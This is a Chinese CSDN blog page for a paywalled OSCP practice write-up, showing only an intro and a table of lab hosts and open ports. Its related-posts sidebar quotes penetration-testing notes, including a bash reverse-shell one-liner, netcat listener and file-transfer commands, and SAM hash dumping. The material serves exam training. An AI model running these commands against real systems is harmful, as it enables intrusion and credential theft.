Challenge 6 - OSCP C

已于 2024-03-18 21:25:24 修改
阅读量204 收藏 1
点赞数 1
分类专栏: OSCP 文章标签: 渗透 OSCP
于 2024-03-14 13:49:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/136455592
版权

因为oscp考试中限制了Metasploit的使用,所以后面解题的过程也尽量不使用,不过可以使用msfvenom生成shell,以及使用exploit/multi/handler来监听,只是不能用meterpreter。具体细节可以参考一下两篇官方文档
https://help.offsec.com/hc/en-us/articles/4547917816468-OffSec-OSCP-Exam-with-AD-Preparation
https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide

汇总

域:OSCP.EXAM

IP HOSTNAME Ports
10.10.x.152 dc01 53,135,139,445,593,636
192.168.x.153 ms01 22,135,139,445,5985,8000,20221
10.10.x.x.154 ms02 135,139,445,1433
192.168.x.155 pascha 80,9099,9999
192.168.x.156 frankfurt 21,22,25,53,80,110,143,465,587,993,995,2525,3306,8080,8083,8443 UDP116
192.168.x.157 charlie
了解本专栏 订阅专栏 解锁全文 超级会员免费看
yu22x
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
Challenge 4 - OSCP A
羽的博客
03-14 329
在c盘下发现一个windows.old,在里面可以找到SYSTEM和SAM文件,下载到本地,利用samdump2解密发现没解出来,再来试试pwdump.py(https://github.com/CiscoCXSecurity/creddump7)得到压缩包密码bludecode,解压之后发现一个比较特殊的文件configuration.php,里面有两个类似密码的字符串。登录之后在/opt/backups/下发现几个特殊文件,其中sitebackup3.zip是个正常的压缩包。但是这个压缩包是有密码的。
java红酒网站源码-Go-For-OSCP:通向OSCP
06-05
java网站源码通向OSCP 我想分享一些我认为帮助我准备进攻性安全认证专家 - OSCP 认证的事情,以及我在实验室和考试中发现的有用信息。 如果您有任何问题,请随时与我联系。 不要忘记: 首先学习课件,然后开始在实验室中练习。 使用其他来源了解更多信息。 加入进攻性安全 PWK 论坛和社交媒体并与其他人交谈。 尖端 在每次重新启动时启用服务: update-rc.d <[SERVICE]> enable 从 html 页面中提取链接: cat index.html | grep "href=" | cut -d "/" -f3| grep "<[DOMAIN]>" | cut -d '"' -f1 | sort -u 网猫 与应用程序交互: nc -nv <[IP]> <[PORT]> 听众: nc -nlvp <[PORT]> 文件传输(客户端): nc -nlvp <[PORT]> > <[FILE]> 文件传输(服务器): nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]> 绑定与反向外壳 绑定外壳: 鲍勃需要爱丽丝的帮助。 Bob 使用 -e
OSCP学习笔记总结(本资料禁止转载)
热门推荐
Shadow的博客
10-19 1万+
OSCP学习笔记 第零章实战学习 反弹shell bash -i >&/dev/tcp/192.168.1.1/4444 0>&1 切换交互式shell python -c 'import pty;pty.spawn("/bin/sh")' 查看系统型号:lab_release -a 查看系统版本:uname -a 查看目标主机网页内容:dirb http://192.168.1.1:80 查看网页漏洞:nikto -h 192.168.1.1 --useprox.
Hack-the-Box-OSCP-Preparation:Hack-the-Box-OSCP-Preparation
03-20
介绍 你好呀!如果您不认识我,我叫Rana Khalil,然后按Twitter句柄 。在花了将近八个月的时间,攻读了Offensive Security Certified Professional(OSCP)认证后,我很高兴地宣布我已获得OSCP官方认证! 我准备的主要资源是下图所示的。当我浏览机器时,我写了关于如何解决上每个盒子的文章/博客。我最初开始写博客是为了确认我对所遇到的概念的理解。俗话说: “如果不能简单地解释它,那么您就不能充分理解它”。要说那是博客的唯一好处就是轻描淡写。这些文章还可以作为在OSCP考试之前复习我的知识的一种方式,以及在考试期间轻松搜索命令/概念的一种方式。令人惊讶的是,像我这样准备进行OSCP考试的许多人正在阅读我的博客。在过去的五个月中,我的中型博客每月平均浏览量超过21,000次! 通过OSCP考试后,我收到了无数的请求,出于种种我不想在这里介绍的原
java红酒网站源码-OSCP:OSCP
06-05
java网站源码这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -name sbd\* 显示活动的互联网连接netstat -lntp 更改密码passwd 验证服务正在运行和侦听netstat -antp |grep apache 启动服务systemctl start ssh systemctl start apache2 在启动时启动服务systemctl enable ssh 停止服务systemctl stop ssh 解压一个gz文件gunzip access.log.gz 解压 tar.gz 文件tar -xzvf file.tar.gz 搜索命令历史history | grep phrase_
javasnmp源码-Go-For-OSCP:通向OSCP
06-04
snmp源码通向OSCP 我想分享一些我认为帮助我准备进攻性安全认证专家 - OSCP 认证的事情,以及我在实验室和考试中发现的有用信息。 如果您有任何问题,请随时与我联系。 不要忘记: 首先学习课件,然后开始在实验室中...
谷歌师兄的leetcode刷题笔记-OSCP-Prep:OSCP准备
06-30
谷歌师兄的leetcode刷题笔记OSCP-准备 PWK 课程大纲 OSCP 喜欢 VulnHub 游戏 Linux 和 Bash Linux 之旅 - Bash 初学者 - 解释壳—— 基本工具 Netcat:整个课程中最重要的工具。 了解它的作用、您有哪些选项、反向 ...
1-OSCP自学笔记-October靶机练习1
08-04
0、前言本教程为《OSCP自学笔记-靶机练习》系列之一的《October靶机练习》,在这个系列中笔者将抽取10台典型靶机作为练习目标,以OSCP学习及考试的角度
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
oscp-command-filtering-tool
03-08
oscp命令过滤工具 特征 根据工具,语言,意图,端口或操作系统轻松过滤命令 自动更新kali和受害者IP地址,因此您不必手动修改命令 过滤器很容易修改,可以添加/删除内容,也可以从全新开始 用法 替换所有IP(kali_ip)->要用新的kali ip替换现有kali ip的所有实例,请在“ New Kali IP”右侧的单元格中输入新的IP地址,然后按replace(每当获得新的vpn ip时) 替换所有IP(victim_ip)->要用新的受害者IP替换受害者IP的所有实例,请在“新受害者IP”右侧的单元格中输入新的IP地址,然后按“替换”(当您攻击新框时) 显示/隐藏/清除过滤器->打开/关闭过滤器 复制到剪贴板->将单元格值复制到剪贴板(对于那些懒于ctrl + c的用户) 指令 开采前 Linux开发后 Windows开发后 免责声明 我与朋友分享了此内容,有些v
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-oscp:OSCP的东西
06-05
java网站源码目录 GitHub 克隆 repo 'git clone 将更改推送到 github 'git push origin master 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe ...h
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
备忘单-上帝:渗透测试参考库-OSCP PTP&PTX备忘单
01-31
备忘单-上帝:渗透测试参考库-OSCP PTP&PTX备忘单
javasnmp源码-OSCP-survival-guide:KaliLinux攻势安全认证专业生存考试指南
06-04
OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置...
java红酒网站源码-OSCP-PWK-Notes-Public:Optixal的进攻性安全认证专家(OSCP)/KaliLinux(PWK)
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值